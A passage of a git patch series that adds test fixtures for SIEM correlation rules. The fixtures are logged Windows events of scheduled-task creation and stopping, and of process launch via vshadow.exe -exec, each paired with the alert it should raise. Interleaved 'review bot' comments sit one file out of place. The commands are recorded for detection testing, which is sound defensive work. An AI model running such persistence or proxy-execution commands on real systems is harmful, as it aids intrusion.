Management", "category.low": "Control", "datafield6": "63310a87-5f74-611a-0000-00204f8fcc01", "event_src.category": "Other", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:username@testlab", "object.account.name": "username", "object.account.privileges": "High", "object.account.session_id": "30183247", "object.process.cmdline": "\"C:\\WINDOWS\\system32\\schtasks.exe\" -create -tn test /sc Onstart", "object.process.cwd": "C:\\Users\\username\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\schtasks.exe", "object.process.guid": "63310a87-6528-611a-0000-00106bb3f401", "object.process.hash.md5": "796B784E98008854C27F4B18D287BA30", "object.process.hash.sha256": "356280CCA63CA5E887FDBE5CB4105A53341FBAC9219EFC51621DF9BA8EE9838B", "object.process.id": "8668", "object.process.meta": "Description:Task Scheduler Configuration Tool | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "schtasks.exe", "object.process.original_name": "schtasks.exe", "object.process.parent.cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "63310a87-64dd-611a-0000-0010b515f401", "object.process.parent.id": "7148", "object.process.parent.name": "powershell.exe", "object.process.parent.path": 
"c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.906 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2021-08-16T16:37:30Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:username@testlab", "subject.account.name": "username", "subject.account.privileges": "High", "subject.account.session_id": "30183247", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-08-16T13:16:24.239Z", "type": "raw", "uuid": "7fb070f5-9025-47dd-a392-21c8aecd2303"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "create the task: test|regex_match: schtasks.exe\" -create", "alert.key": "\"c:\\windows\\system32\\schtasks.exe\" -create -tn test /sc onstart", "category.generic": "Attack", "category.high": "Execution", "category.low": "Scheduled Task", "correlation_name": "Schtasks_Commandline", "correlation_type": "event", "datafield6": "63310a87-5f74-611a-0000-00204f8fcc01", "event_src.category": "Other", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Schtasks_Commandline|test_w10x64-130.testlab.org|synthetic:username@testlab|username|create", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "process", "object.account.domain": "testlab", "object.account.id": "synthetic:username@testlab", "object.account.name": "username", "object.account.session_id": "30183247", "object.name": "test", "object.process.cmdline": 
"\"C:\\WINDOWS\\system32\\schtasks.exe\" -create -tn test /sc Onstart", "object.process.cwd": "C:\\Users\\username\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\schtasks.exe", "object.process.guid": "63310a87-6528-611a-0000-00106bb3f401", "object.process.id": "8668", "object.process.meta": "Description:Task Scheduler Configuration Tool | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "schtasks.exe", "object.process.original_name": "schtasks.exe", "object.process.parent.cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "object.process.parent.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "63310a87-64dd-611a-0000-0010b515f401", "object.process.parent.id": "7148", "object.process.parent.name": "powershell.exe", "object.process.parent.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.906 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "synthetic:username@testlab", "subject.account.name": "username", "subject.account.privileges": "High", "subject.account.session_id": "30183247"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc new file mode 100644 index 00000000..c981b269 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_2.sc 
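Review bot: The comment line `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is the generator's placeholder ("your test goes here; state how many and which correlation events you expect") committed verbatim, so the fixture says nothing about what it actually exercises; the same placeholder is left in test_2.sc, test_3.sc and in Start_process_as_vshadow_child/tests/test_1.sc later in this series. Replace it with a one-line description of the case, e.g. `# Sysmon EventID 1: schtasks.exe -create launched from powershell.exe -> one Schtasks_Commandline "create" event expected`. All three Schtasks_Commandline fixtures are positive cases; a fixture with a benign invocation such as `schtasks.exe /query` asserting that no correlation event is produced would guard the `regex_match` seen in `alert.context` against over-matching once the pattern is edited. The rule itself is not in this series, so whether it already narrows on `-create` is inferred from `alert.context` only.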
@@ -0,0 +1,5 @@ +{"action": "execute", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-PowerShell\", \"Guid\": \"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\" }, \"EventID\": \"4104\", \"Version\": \"1\", \"Level\": \"5\", \"Task\": \"2\", \"Opcode\": \"15\", \"Keywords\": \"0x0\", \"TimeCreated\": { \"SystemTime\": \"2021-08-16T13:16:24.2372357Z\" }, \"EventRecordID\": \"661762\", \"Correlation\": { \"ActivityID\": \"{a5f1f89b-9179-0005-5b0c-f3a57991d701}\" }, \"Execution\": { \"ProcessID\": \"7148\", \"ThreadID\": \"5328\" }, \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Computer\": \"Test_w10x64-130.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-21-1129291328-2819992169-918366777-1113\" } }, \"EventData\": { \"Data\": [ { \"text\": \"1\", \"Name\": \"MessageNumber\" }, { \"text\": \"1\", \"Name\": \"MessageTotal\" }, { \"text\": \"schtasks.exe -create -tn \\\"test\\\" /sc Onstart \", \"Name\": \"ScriptBlockText\" }, { \"text\": \"3f1bc101-7f89-45b1-b934-0843b62a022c\", \"Name\": \"ScriptBlockId\" }, { \"Name\": \"Path\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"Creating Scriptblock text (1 of 1):\\r\\nschtasks.exe -create -tn \\\"test\\\" /sc Onstart \\r\\n\\r\\nScriptBlock ID: 3f1bc101-7f89-45b1-b934-0843b62a022c\\r\\nPath: \", \"Level\": \"Verbose\", \"Task\": \"Execute a Remote Command\", \"Opcode\": \"On create calls\", \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": 
"microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.id": "3f1bc101-7f89-45b1-b934-0843b62a022c", "object.process.cmdline": "schtasks.exe -create -tn \"test\" /sc Onstart", "object.process.id": "7148", "object.value": "schtasks.exe -create -tn \"test\" /sc Onstart", "recv_ipv4": "127.0.0.1", "recv_time": "2021-08-16T16:44:55Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-08-16T13:16:24.237Z", "type": "raw", "uuid": "81abeb5a-6639-49fe-b87a-58050f411983"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "create", "alert.context": "create the task: test|regex_match: schtasks.exe -create", "alert.key": "schtasks.exe -create -tn \"test\" /sc onstart", "category.generic": "Attack", "category.high": "Execution", "category.low": "Scheduled Task", "correlation_name": "Schtasks_Commandline", "correlation_type": "event", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Schtasks_Commandline|test_w10x64-130.testlab.org|S-1-5-21-1129291328-2819992169-918366777-1113||create", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.id": "3f1bc101-7f89-45b1-b934-0843b62a022c", "object.name": "test", "object.process.cmdline": "schtasks.exe -create -tn \"test\" /sc Onstart", "object.process.id": "7148", "object.value": "schtasks.exe -create -tn \"test\" /sc Onstart", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113"} + diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc new file mode 100644 index 00000000..b7a0c099 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Schtasks_Commandline/tests/test_3.sc 
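Review bot: The expected `incident.aggregation.key` is `Schtasks_Commandline|test_w10x64-130.testlab.org|S-1-5-21-1129291328-2819992169-918366777-1113||create`, with an empty fourth component, because the PowerShell 4104 fixture normalises only a SID and no `subject.account.name`; the Sysmon fixture in test_1.sc keys the same user as `synthetic:username@testlab|username`, so the two sources will never aggregate into one incident. If that is intended, the test should say so in its header comment (e.g. `# 4104 carries no account name: aggregation key has an empty name slot by design`); if not, the rule should fall back to the SID or omit the slot. Minor: this file is the only one of the three with a trailing empty line (`+1,5` versus `+1,4`).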
@@ -0,0 +1,4 @@ +{"action": "execute", "body": "{ \"Event\": { \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\", \"System\": { \"Provider\": { \"Name\": \"Microsoft-Windows-PowerShell\", \"Guid\": \"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\" }, \"EventID\": \"4103\", \"Version\": \"1\", \"Level\": \"4\", \"Task\": \"106\", \"Opcode\": \"20\", \"Keywords\": \"0x0\", \"TimeCreated\": { \"SystemTime\": \"2021-08-16T14:30:58.9480233Z\" }, \"EventRecordID\": \"661880\", \"Correlation\": { \"ActivityID\": \"{a5f1f89b-9179-0002-50e2-f2a57991d701}\" }, \"Execution\": { \"ProcessID\": \"7148\", \"ThreadID\": \"5328\" }, \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Computer\": \"Test_w10x64-130.testlab.org\", \"Security\": { \"UserID\": \"S-1-5-21-1129291328-2819992169-918366777-1113\" } }, \"EventData\": { \"Data\": [ { \"text\": \" Severity = Informational\\r\\n Host Name = ConsoleHost\\r\\n Host Version = 5.1.19041.1151\\r\\n Host ID = 5e42d873-69cb-4e36-be87-477b62fbd6d7\\r\\n Host Application = C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\n Engine Version = 5.1.19041.1151\\r\\n Runspace ID = 42cacf1f-2d8b-4a39-a17a-273e3f3df292\\r\\n Pipeline ID = 86\\r\\n Command Name = Invoke-Expression\\r\\n Command Type = Cmdlet\\r\\n Script Name = \\r\\n Command Path = \\r\\n Sequence Number = 180\\r\\n User = TESTLAB\\\\username\\r\\n Connected User = \\r\\n Shell ID = Microsoft.PowerShell\\r\\n\", \"Name\": \"ContextInfo\" }, { \"Name\": \"UserData\" }, { \"text\": \"CommandInvocation(Invoke-Expression): \\\"Invoke-Expression\\\"\\r\\nParameterBinding(Invoke-Expression): name=\\\"Command\\\"; value=\\\"Stop-ScheduledTask -taskname test\\\"\\r\\n\", \"Name\": \"Payload\" } ] }, \"RenderingInfo\": { \"Culture\": \"en-US\", \"Message\": \"CommandInvocation(Invoke-Expression): \\\"Invoke-Expression\\\"\\r\\nParameterBinding(Invoke-Expression): name=\\\"Command\\\"; value=\\\"Stop-ScheduledTask -taskname 
test\\\"\\r\\n\\r\\n\\r\\nContext:\\r\\n Severity = Informational\\r\\n Host Name = ConsoleHost\\r\\n Host Version = 5.1.19041.1151\\r\\n Host ID = 5e42d873-69cb-4e36-be87-477b62fbd6d7\\r\\n Host Application = C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\r\\n Engine Version = 5.1.19041.1151\\r\\n Runspace ID = 42cacf1f-2d8b-4a39-a17a-273e3f3df292\\r\\n Pipeline ID = 86\\r\\n Command Name = Invoke-Expression\\r\\n Command Type = Cmdlet\\r\\n Script Name = \\r\\n Command Path = \\r\\n Sequence Number = 180\\r\\n User = TESTLAB\\\\username\\r\\n Connected User = \\r\\n Shell ID = Microsoft.PowerShell\\r\\n\\r\\n\\r\\nUser Data:\\r\\n\\r\\n\", \"Level\": \"Information\", \"Task\": \"Executing Pipeline\", \"Opcode\": \"To be used when operation is just executing a method\", \"Channel\": \"Microsoft-Windows-PowerShell/Operational\", \"Provider\": null, \"Keywords\": null } } }", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "86", "datafield8": "5.1.19041.1151", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4103_pipeline_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4103", "normalized": true, "object": "command", "object.account.domain": "testlab", "object.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "object.account.name": "username", "object.process.cmdline": "\"Invoke-Expression\" -Command \"Stop-ScheduledTask -taskname test\"", "object.process.name": "Invoke-Expression", 
"object.process.parent.cmdline": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "5e42d873-69cb-4e36-be87-477b62fbd6d7", "object.process.parent.id": "7148", "object.value": "CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\r\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Stop-ScheduledTask -taskname test\"", "recv_ipv4": "127.0.0.1", "recv_time": "2021-08-16T17:32:14Z", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "subject.account.name": "username", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-08-16T14:30:58.948Z", "type": "raw", "uuid": "107bcd70-6173-48a4-969b-05bce36a8384"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "stop", "alert.context": "stop the task: test|regex_match: stop-scheduledtask", "alert.key": "\"invoke-expression\" -command \"stop-scheduledtask -taskname test\"", "category.generic": "Attack", "category.high": "Execution", "category.low": "Scheduled Task", "chain_id": "86", "correlation_name": "Schtasks_Commandline", "correlation_type": "event", "datafield8": "5.1.19041.1151", "event_src.category": "Operating system", "event_src.fqdn": "test_w10x64-130.testlab.org", "event_src.host": "test_w10x64-130.testlab.org", "event_src.hostname": "test_w10x64-130", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Schtasks_Commandline|test_w10x64-130.testlab.org|S-1-5-21-1129291328-2819992169-918366777-1113|username|stop", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.domain": "testlab", "object.account.id": 
"S-1-5-21-1129291328-2819992169-918366777-1113", "object.account.name": "username", "object.name": "test", "object.process.cmdline": "\"Invoke-Expression\" -Command \"Stop-ScheduledTask -taskname test\"", "object.process.name": "Invoke-Expression", "object.process.parent.cmdline": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "object.process.parent.guid": "5e42d873-69cb-4e36-be87-477b62fbd6d7", "object.process.parent.id": "7148", "object.value": "CommandInvocation(Invoke-Expression): \"Invoke-Expression\"\r\nParameterBinding(Invoke-Expression): name=\"Command\"; value=\"Stop-ScheduledTask -taskname test\"", "status": "success", "subject": "account", "subject.account.domain": "testlab", "subject.account.id": "S-1-5-21-1129291328-2819992169-918366777-1113", "subject.account.name": "username"}
\ No newline at end of file
From 3705a309800ee5da61eebc69e6cb4ce3d8cccca4 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 10:32:26 +0300
Subject: [PATCH 34/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Start=5Fprocess=5Fas=5F?= =?UTF-8?q?vshadow=5Fchild)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../Start_process_as_vshadow_child/tests/test_1.sc | 4 ++++
 1 file changed, 4 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc
new file mode 100644
index 00000000..10f89499
--- /dev/null
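Review bot: The expected event for the 4103 `Stop-ScheduledTask` case carries `"importance": "medium"` together with `"incident.severity": "high"`, while test_1.sc and test_2.sc expect `high`/`high`; the rule is outside this series, so this may be deliberate (lower importance for `stop`, fixed severity for the rule), but a reader cannot tell it from a copy-paste slip. State the intent in the file's header comment, e.g. `# 4103 pipeline event: Invoke-Expression -> Stop-ScheduledTask; "stop" action is importance=medium, incident.severity stays high`. This fixture also shows that the rule matches PowerShell cmdlets and not only schtasks.exe, which the rule name does not suggest and the test should mention.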
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/Start_process_as_vshadow_child/tests/test_1.sc 
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-28T02:14:50.4136318Z\"},\"EventRecordID\":\"6414\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"548\",\"ThreadID\":\"2444\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-05-28 02:14:50.390\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-999a-5cec-0000-0010c3a11700}\"},{\"Name\":\"ProcessId\",\"text\":\"1516\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\notepad.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7600.16385 (win7_rtm.090713-1255)\"},{\"Name\":\"Description\",\"text\":\"Notepad\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"c:\\\\windows\\\\System32\\\\notepad.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"c:\\\\ProgramData\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-82ec-5cec-0000-0020734a0100}\"},{\"Name\":\"LogonId\",\"text\":\"0x14a73\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-9998-5cec-0000-00107d501700}\"},{\"Name\":\"ParentProcessId\",\"text\":\"3092\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\ProgramData\\\\vshadow.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"vshadow.exe -nw -exec=c:\\\\windows\\\\System32\\\\notepad.exe c:\\\\\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-82ec-5cec-0000-0020734a0100", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "84595", "object.process.cmdline": "\"c:\\windows\\System32\\notepad.exe\"", "object.process.cwd": "c:\\ProgramData\\", 
"object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-999a-5cec-0000-0010c3a11700", "object.process.hash.imphash": "53A6715F589E88C4FD4541C81B4F57C3", "object.process.hash.md5": "A4F6DF0E33E644E802C8798ED94D80EA", "object.process.hash.sha1": "FC64B1EF19E7F35642B2A2EA5F5D9F4246866243", "object.process.hash.sha256": "B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B", "object.process.id": "1516", "object.process.meta": "Description:Notepad | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "notepad.exe", "object.process.parent.cmdline": "vshadow.exe -nw -exec=c:\\windows\\System32\\notepad.exe c:\\", "object.process.parent.fullpath": "c:\\programdata\\vshadow.exe", "object.process.parent.guid": "365abb72-9998-5cec-0000-00107d501700", "object.process.parent.id": "3092", "object.process.parent.name": "vshadow.exe", "object.process.parent.path": "c:\\programdata\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T11:42:05.596Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "84595", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-28T02:14:50.390Z", "type": "raw", "uuid": "a5783593-a6fe-45c5-8aad-adf29c9ebb39"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Services: Service Execution", "correlation_name": "Start_process_as_vshadow_child", "correlation_type": "incident", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Start_process_as_vshadow_child|iewin7|synthetic:ieuser@iewin7", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.session_id": "84595", "object.process.cmdline": "\"c:\\windows\\System32\\notepad.exe\"", "object.process.cwd": "c:\\ProgramData\\", "object.process.fullpath": "c:\\windows\\system32\\notepad.exe", "object.process.guid": "365abb72-999a-5cec-0000-0010c3a11700", "object.process.hash.md5": "A4F6DF0E33E644E802C8798ED94D80EA", "object.process.hash.sha1": "FC64B1EF19E7F35642B2A2EA5F5D9F4246866243", "object.process.hash.sha256": "B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B", "object.process.id": "1516", "object.process.meta": "Description:Notepad | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "notepad.exe", "object.process.parent.cmdline": "vshadow.exe -nw -exec=c:\\windows\\System32\\notepad.exe c:\\", "object.process.parent.fullpath": "c:\\programdata\\vshadow.exe", "object.process.parent.guid": "365abb72-9998-5cec-0000-00107d501700", "object.process.parent.id": "3092", "object.process.parent.name": "vshadow.exe", "object.process.parent.path": "c:\\programdata\\", "object.process.path": "c:\\windows\\system32\\", 
"object.process.version": "6.1.7600.16385 (win7_rtm.090713-1255)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "84595"}
From 1c6a5e79bbdb297f92c76015f4d6d81ef3ee1f75 Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 10:50:12 +0300
Subject: [PATCH 35/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(VSSVC=5F?= =?UTF-8?q?service=5Fstate=5Fchanged)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
3-4 интеграционный тест не могут нормализовать данные.
---
 .../VSSVC_service_state_changed/tests/test_1.sc | 4 ++++
 .../VSSVC_service_state_changed/tests/test_2.sc | 4 ++++
 2 files changed, 8 insertions(+)
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc
 create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc
new file mode 100644
index 00000000..a925c843
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_1.sc
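Review bot: The raw Sysmon event normalises four hashes (`object.process.hash.imphash`, `.md5`, `.sha1`, `.sha256`) but the expected Start_process_as_vshadow_child incident lists only md5, sha1 and sha256; if the rule copies hash fields by explicit name, the dropped imphash should be documented in the fixture's header comment (`# rule does not forward object.process.hash.imphash`), otherwise it reads as an omission in the rule that this test now locks in. The input also carries the fixture artefact `"tag": "some_tag"`, which is not reflected in the expectation and could be removed to keep the sample close to a real event. The vshadow.exe parent here runs from `c:\\programdata\\`; a second fixture with the parent in a different directory would show that the rule keys on the parent image name rather than its path, which is only inferred here.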
